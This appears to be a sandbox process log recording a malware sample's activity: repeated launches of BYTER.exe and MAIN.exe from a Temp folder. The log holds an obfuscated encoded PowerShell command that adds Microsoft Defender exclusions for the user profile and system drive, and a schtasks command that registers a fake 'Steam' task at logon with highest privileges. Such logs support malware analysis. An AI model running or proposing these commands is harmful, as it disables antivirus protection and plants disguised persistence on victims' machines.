"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1366695945-1939044485-405268087542048551567893023-120042430913678080031225512765"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4CB9.tmp.bat""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "20005721183767610092050384264-3432325021216569752-1480255568-1031908428-645852718"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Roaming\Steam.exe

"C:\Users\Admin\AppData\Roaming\Steam.exe"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp70DC.tmp.bat""

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-531399342165778056906781422141363396-1060219291-5034032141905332277-563561859"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

